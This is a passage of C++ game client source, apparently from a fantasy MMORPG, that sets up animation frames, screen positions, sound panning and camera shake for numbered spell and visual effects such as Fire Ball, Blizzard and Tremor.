			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX)-320)*30;
#endif
			PlaySound('E', 5, sDist, lPan);
			break;

		case 53: // Hold twist
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 15;
			m_pEffectList[i]->m_dwFrameTime = 80;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX) - 400) * 30;
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX)-320)*30;
#endif
			PlaySound('E', 5, sDist, lPan);
			break;

		case 54: // star twingkling (effect armes brillantes)
		case 55: // Unused
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 10;
			m_pEffectList[i]->m_dwFrameTime = 15;
			break;

		case 56: //  Mass-Chill-Wind
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 14;
			m_pEffectList[i]->m_dwFrameTime = 30;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX) - 400) * 30;
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX)-320)*30;
#endif
			PlaySound('E', 45, sDist, lPan);
			break;

		case 57: //
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_cMaxFrame   = 16;
			m_pEffectList[i]->m_dwFrameTime = 80;
			break;

		case 60: //
			m_pEffectList[i]->m_mX    = sX +300;
			m_pEffectList[i]->m_mY    = sY -460;
			m_pEffectList[i]->m_cMaxFrame   = 10;
			m_pEffectList[i]->m_dwFrameTime = 50;
			break;

		case 61: //
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_cMaxFrame   = 16;
			m_pEffectList[i]->m_dwFrameTime = 10;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
#endif
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(((m_sViewPointX / 32) + 12) - sX)*1000;// centu - 800x600
			PlaySound('E', 4, sDist, lPan);
			SetCameraShakingEffect(sDist, 2);
			break;

		case 62: //
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_cMaxFrame   = 6;
			m_pEffectList[i]->m_dwFrameTime = 100;
			break;

		case 63: //
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_cMaxFrame   = 16;
			m_pEffectList[i]->m_dwFrameTime = 20;
			break;

		case 64: //
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_cMaxFrame   = 15;
			m_pEffectList[i]->m_dwFrameTime = 20;
			break;

		case 65: // Crusade's MS
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_cMaxFrame   = 30;
			m_pEffectList[i]->m_dwFrameTime = 80;
			break;

		case 66: // Crusade MS explosion
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_cMaxFrame   = 14;
			m_pEffectList[i]->m_dwFrameTime = 30;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
#endif
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(((m_sViewPointX / 32) + 12) - sX)*1000;// centu - 800x600
			PlaySound('E', 4, sDist, lPan);
			SetCameraShakingEffect(sDist, 2);
			break;

		case 67: // Crusade's MS fire + smoke ?
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_cMaxFrame   = 27;
			m_pEffectList[i]->m_dwFrameTime = 10;
			break;

		case 68: // worm-bite
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_cMaxFrame   = 17;
			m_pEffectList[i]->m_dwFrameTime = 30;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
#endif
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(((m_sViewPointX / 32) + 12) - sX)*1000;// centu - 800x600
			PlaySound('E', 4, sDist, lPan);
			m_pEffectList[i]->m_iV1 = sDist;
			break;

		case 69: // identique au cas 70
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_cMaxFrame   = 11;
			m_pEffectList[i]->m_dwFrameTime = 30;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
#endif
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(((m_sViewPointX / 32) + 12) - (sX/32))*1000;// centu - 800x600
			PlaySound('E', 42, sDist, lPan);
			break;

		case 70: // identtique au cas 69
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_cMaxFrame   = 11;
			m_pEffectList[i]->m_dwFrameTime = 30;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
#endif
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(((m_sViewPointX / 32) + 12) - (sX/32))*1000;// centu - 800x600
			PlaySound('E', 42, sDist, lPan);
			break;

		case 71: //
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32;
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_cMaxFrame   = NULL;
			m_pEffectList[i]->m_dwFrameTime = 20;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
#endif
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			SetCameraShakingEffect(sDist);
			break;

		case 72: // Blizzard
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 15;
			m_pEffectList[i]->m_dwFrameTime = 20;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX) - 400) * 30;
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = ((sX - m_sViewPointX)-320)*30;
#endif
			if ((rand()%4) == 1) SetCameraShakingEffect(sDist);
			PlaySound('E', 47, sDist, lPan);
			break;

		case 73:
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 15;
			m_pEffectList[i]->m_dwFrameTime = 60;
			break;

		case 74:
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 19;
			m_pEffectList[i]->m_dwFrameTime = 40;
			break;

		case 75: //ice golem
		case 76: //ice golem
		case 77: //ice golem
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_dX = dX;
			m_pEffectList[i]->m_dY = dY;
			m_pEffectList[i]->m_cMaxFrame   = 16;
			m_pEffectList[i]->m_dwFrameTime = 40;
			break;

		case 80: // Snoopy: rajou, implment en dernier ds la v351
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_iV1    = 20;
			m_pEffectList[i]->m_cMaxFrame   = 30;
			m_pEffectList[i]->m_dwFrameTime = 25;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
#endif
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			SetCameraShakingEffect(sDist);
			break;

		case 81: //  Snoopy: Rajout (StormBlade)
			m_pEffectList[i]->m_mX		= sX*32;
			m_pEffectList[i]->m_mY		= sY*32;
			m_pEffectList[i]->m_iErr	= 0;
			m_pEffectList[i]->m_cMaxFrame   = 27;
			m_pEffectList[i]->m_dwFrameTime = 40;
			break;

		case 82: //  Snoopy: Rajout (Gate Apocalypse)
			m_pEffectList[i]->m_cMaxFrame   = 30;
			m_pEffectList[i]->m_dwFrameTime = 40;
			break;

		case 100: // MagicMissile is Flying
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32 - 40;
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_cMaxFrame   = NULL;
			m_pEffectList[i]->m_dwFrameTime = 20;
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 1, sDist, lPan);
			break;

		case 101: // Heal
		case 111: // Staminar-Drain
		case 121: // Great Heal
		case 123: // Staminar-Recovery
		case 128: // Great-Staminar-Recovery
			m_pEffectList[i]->m_cMaxFrame   = 14;
			m_pEffectList[i]->m_dwFrameTime = 80;
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 5, sDist, lPan);
			break;

		case 102: // CreateFood
		case 104: // Create Potion
		case 122: // Recall
		case 126: // Possession
		case 127: // Poison
		case 134: // DetectInvi
		case 136: // Cure
		case 142: // Confuse language
		
		case 153: // Mass-Poison
		case 162: // Confusion
		case 171: // Mass-Confusion
			m_pEffectList[i]->m_cMaxFrame   = 13;
			m_pEffectList[i]->m_dwFrameTime = 120;
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 5, sDist, lPan);
			break;

		case 152: // Centuu: Polymorph
			m_pEffectList[i]->m_cMaxFrame = 15;
			m_pEffectList[i]->m_dwFrameTime = 20;
			m_pEffectList[i]->m_cMaxFrame = 15;
			m_pEffectList[i]->m_dwFrameTime = 20;
			m_pEffectList[i]->m_mX = sX * 32;
			m_pEffectList[i]->m_mY = sY * 32 - 50;
			m_pEffectList[i]->m_iErr = 0;
			m_pEffectList[i]->m_rX = 5 - (rand() % 10);
			m_pEffectList[i]->m_rY = 5 - (rand() % 10);
			lPan = -(((m_sViewPointX / 32) + 12) - dX) * 1000;// centu - 800x600
			PlaySound('E', 39, sDist, lPan);
			break;

		case 110: // Energy-Bolt
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32 - 40;
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_cMaxFrame   = NULL;
			m_pEffectList[i]->m_dwFrameTime = 20;
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 1, sDist, lPan);
			break;

		case 112: // Recall
		case 131: // Summon
		case 132: // Invi
			m_pEffectList[i]->m_cMaxFrame   = 12;
			m_pEffectList[i]->m_dwFrameTime = 80;
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 5, sDist, lPan);
			break;

		case 113: // Defense-Shield
		case 144: // Great-Defense-Shield
			m_pEffectList[i]->m_cMaxFrame   = 12;
			m_pEffectList[i]->m_dwFrameTime = 120;
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 5, sDist, lPan);
			break;

		case 114: // Celebrating Light
			bAddNewEffect(69 +(rand()%2), dX*32 +20 - (rand() % 40), dY*32 +20 - (rand() % 40), NULL, NULL, -12);
			bAddNewEffect(69 +(rand()%2), dX*32 +20 - (rand() % 40), dY*32 +20 - (rand() % 40), NULL, NULL, -9);
			bAddNewEffect(69 +(rand()%2), dX*32 +20 - (rand() % 40), dY*32 +20 - (rand() % 40), NULL, NULL, -6);
			bAddNewEffect(69 +(rand()%2), dX*32 +20 - (rand() % 40), dY*32 +20 - (rand() % 40), NULL, NULL, -3);
			bAddNewEffect(69 +(rand()%2), dX*32 +20 - (rand() % 40), dY*32 +20 - (rand() % 40), NULL, NULL, 0);
			delete m_pEffectList[i];
			m_pEffectList[i] = NULL;
			break;

		case 120: // Fire Ball
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32 - 40;
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_cMaxFrame   = NULL;
			m_pEffectList[i]->m_dwFrameTime = 20;
			m_pEffectList[i]->m_cDir = m_Misc.cCalcDirection(sX, sY, dX, dY);
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 1, sDist, lPan);
			break;

		case 124: // Protect form N.M
		case 133: // Protection from Magic
 			bAddNewEffect(52, dX*32, dY*32, NULL, NULL, 0, 0);
			delete m_pEffectList[i];
			m_pEffectList[i] = NULL;
			break;

		case 125: // Hold Person
		case 135: // Paralyze
			bAddNewEffect(53, dX*32, dY*32, NULL, NULL, 0, 0);
			delete m_pEffectList[i];
			m_pEffectList[i] = NULL;
			break;

		case 130: // Fire Strike
		case 137: // Lightning Arrow
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32 - 40;
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_cMaxFrame   = NULL;
			m_pEffectList[i]->m_dwFrameTime = 20;
			m_pEffectList[i]->m_cDir = m_Misc.cCalcDirection(sX, sY, dX, dY);
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 1, sDist, lPan);
			break;

		case 138: // Tremor.
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 4, sDist, lPan);
			SetCameraShakingEffect(sDist, 2);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);

			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			m_pEffectList[i]->m_cMaxFrame   = 2;
			m_pEffectList[i]->m_dwFrameTime = 10;
			break;

		case 143: // Lightning
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32 - 50;
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_rX     = 5 - (rand() % 10);
			m_pEffectList[i]->m_rY	   = 5 - (rand() % 10);
			m_pEffectList[i]->m_cMaxFrame   = 7;
			m_pEffectList[i]->m_dwFrameTime = 10;
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 40, sDist, lPan);
			break;

		case 145: // ChillWind
			m_pEffectList[i]->m_cMaxFrame   = 2;
			m_pEffectList[i]->m_dwFrameTime = 10;
			break;

		case 147: // Triple-Energy-Bolt
			m_pEffectList[i]->m_cMaxFrame   = NULL ;
			m_pEffectList[i]->m_dwFrameTime = 20;
			break;

		case 150: // Berserk : Cirlcle 6 magic
		case 177: // Illusion-Movement
		case 180: // Illusion
		case 183: // Inhibition-Casting
		case 190: // Mass-Illusion
		case 195: // Mass-Illusion-Movement
			m_pEffectList[i]->m_cMaxFrame   = 11;
			m_pEffectList[i]->m_dwFrameTime = 100;
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 5, sDist, lPan);
			break;

		case 151: // LightningBolt
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32 - 50;
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_rX     = 5 - (rand() % 10);
			m_pEffectList[i]->m_rY	   = 5 - (rand() % 10);
			m_pEffectList[i]->m_cMaxFrame   = 10;
			m_pEffectList[i]->m_dwFrameTime = 10;
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 40, sDist, lPan);
			break;

		case 156: // Mass-Ligtning-Arrow
			m_pEffectList[i]->m_cMaxFrame   = 3;
			m_pEffectList[i]->m_dwFrameTime = 130;
			break;

		case 157: // Ice-Strike
			m_pEffectList[i]->m_cMaxFrame   = 2;
			m_pEffectList[i]->m_dwFrameTime = 10;
			break;

		case 160: // Energy-Strike
			m_pEffectList[i]->m_cMaxFrame   = 7;
			m_pEffectList[i]->m_dwFrameTime = 80;
			break;

		case 161: // Mass-Fire-Strike
		case 251: //
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32 - 40;
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_cMaxFrame   = NULL;
			m_pEffectList[i]->m_dwFrameTime = 20;
			m_pEffectList[i]->m_cDir = m_Misc.cCalcDirection(sX, sY, dX, dY);
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 1, sDist, lPan);
			break;

		case 163: // Mass-Chill-Wind
			m_pEffectList[i]->m_cMaxFrame   = 2;
			m_pEffectList[i]->m_dwFrameTime = 10;
			break;

		case 164: // worm-bite
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 4, sDist, lPan);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);

			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			bAddNewEffect(14, dX*32 + (rand() % 120) - 60, dY*32 + (rand() % 80) - 40, NULL, NULL, 0, 0);
			m_pEffectList[i]->m_cMaxFrame   = 1;
			m_pEffectList[i]->m_dwFrameTime = 10;
			break;

		case 165: // Absolute-Magic-Protection
			m_pEffectList[i]->m_cMaxFrame   = 21;
			m_pEffectList[i]->m_dwFrameTime = 70;
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 5, sDist, lPan);
			break;

		case 166: // Armor Break
			m_pEffectList[i]->m_cMaxFrame   = 13;
			m_pEffectList[i]->m_dwFrameTime = 80;
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 5, sDist, lPan);
			break;

		case 170: // Bloody-Shock-Wave
			m_pEffectList[i]->m_cMaxFrame   = 7;
			m_pEffectList[i]->m_dwFrameTime = 80;
			break;

		case 172: // Mass-Ice-Strike
			m_pEffectList[i]->m_cMaxFrame   = 2;
			m_pEffectList[i]->m_dwFrameTime = 10;
			break;

		case 174: // Lightning-Strike
			m_pEffectList[i]->m_cMaxFrame   = 5;
			m_pEffectList[i]->m_dwFrameTime = 120;
			break;

		case 176: // Snoopy: Ajout Cancellation
			m_pEffectList[i]->m_cMaxFrame   = 23;
			m_pEffectList[i]->m_dwFrameTime = 60;
			sDist = sDist / 32;
			lPan = -(((m_sViewPointX / 32) + 12) - sX)*1000;// centu - 800x600
			PlaySound('E', 5, sDist, lPan);
			break;

		case 181: // MS
			m_pEffectList[i]->m_mX    = dX*32 +300;
			m_pEffectList[i]->m_mY    = dY*32 -460;
			m_pEffectList[i]->m_cMaxFrame   = 10;
			m_pEffectList[i]->m_dwFrameTime = 25;
			break;

		case 182: // Snoopy: Ajout Mass-Magic-Missile
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32 - 40;
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_cMaxFrame   = NULL;
			m_pEffectList[i]->m_dwFrameTime = 20;
			lPan = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
			PlaySound('E', 1, sDist, lPan);
			break;

		case 244: // Snoopy: dplac pour nvx sorts: Aura du casteur de Mass MagicMissile
		
			m_pEffectList[i]->m_cMaxFrame   = 29;
			m_pEffectList[i]->m_dwFrameTime = 80;
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			break;

		case 191: // Blizzard
			m_pEffectList[i]->m_cMaxFrame   = 7;
			m_pEffectList[i]->m_dwFrameTime = 80;
			break;

		case 242: // Hero set Effect
			m_pEffectList[i]->m_cMaxFrame   = 30;
			m_pEffectList[i]->m_dwFrameTime = 40;
			break;

		case 243: // Hero set Effect
			m_pEffectList[i]->m_cMaxFrame   = 19;
			m_pEffectList[i]->m_dwFrameTime = 18;
			break;

		case 194: // Resurrection
			m_pEffectList[i]->m_cMaxFrame   = 30;
			m_pEffectList[i]->m_dwFrameTime = 40;
			break;

		case 149:
		case 198: // Strike-Of-The-Ghosts
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32;
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_cMaxFrame   = 8;
			m_pEffectList[i]->m_dwFrameTime = 25;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
#endif
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			break;
		case 245: // Ghosts 1
			m_pEffectList[i]->m_mX    = sX;
			m_pEffectList[i]->m_mY    = sY;
			m_pEffectList[i]->m_cMaxFrame   = 17;
			m_pEffectList[i]->m_dwFrameTime = 30;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
#endif
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			lPan = -(((m_sViewPointX / 32) + 12) - sX)*1000;// centu - 800x600
			PlaySound('E', 4, sDist, lPan);
			m_pEffectList[i]->m_iV1 = sDist;
			break;

		case 196: // Snoopy: Ajout de Earth-Shock-Wave
			m_pEffectList[i]->m_mX     = sX*32;
			m_pEffectList[i]->m_mY     = sY*32;
			m_pEffectList[i]->m_iErr   = 0;
			m_pEffectList[i]->m_cMaxFrame   = 30;
			m_pEffectList[i]->m_dwFrameTime = 25;
#ifdef RES_HIGH
			sAbsX = abs(400 - (sX - m_sViewPointX));
			sAbsY = abs(300 - (sY - m_sViewPointY));
#else
			sAbsX = abs(320 - (sX - m_sViewPointX));
			sAbsY = abs(240 - (sY - m_sViewPointY));
#endif
			if (sAbsX > sAbsY) sDist = sAbsX;
			else sDist = sAbsY;
			sDist = sDist / 32;
			SetCameraShakingEffect(sDist);
			break;
		case 200: //
		case 201: //
		case 202: //
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 15;
			m_pEffectList[i]->m_dwFrameTime = 25;
			break;

		case 203: //
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 18;
			m_pEffectList[i]->m_dwFrameTime = 70;
			break;

		case 204: //
		case 205: //
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 12;
			m_pEffectList[i]->m_dwFrameTime = 70;
			break;

		case 206: //
			m_pEffectList[i]->m_mX     = sX;
			m_pEffectList[i]->m_mY     = sY;
			m_pEffectList[i]->m_cMaxFrame   = 3;
			m_pEffectList[i]->m_dwFrameTime = 70;
			break;

		case 247: // AFKChecker
            m_pEffectList[i]->m_mX     = sX*32;
            m_pEffectList[i]->m_mY     = sY*32;
            m_pEffectList[i]->m_cMaxFrame   = 17;
            m_pEffectList[i]->m_dwFrameTime = 200;
            m_pEffectList[i]->m_mX3    = sDist;
            m_pEffectList[i]->m_mY3    = -(((m_sViewPointX / 32) + 12) - dX)*1000;// centu - 800x600
            m_pEffectList[i]->m_iV1    = rand()%35;
            m_pEffectList[i]->m_cFrame = - rand() %12;
            break;

		case 250: //
			m_pEffectList[i]->m_mX     = sX * 32;
			m_pEffectList[i]->m_mY     = sY * 32 -40;
			m_pEffectList[i]->m_iErr = 0;
			m_pEffectList[i]->m_cMaxFrame   = 0;
			m_pEffectList[i]->m_dwFrameTime = 10;
			break;

		default:
			delete m_pEffectList[i];
			m_pEffectList[i] = NULL;
			break;
		}
		if (m_pEffectList[i] != NULL)
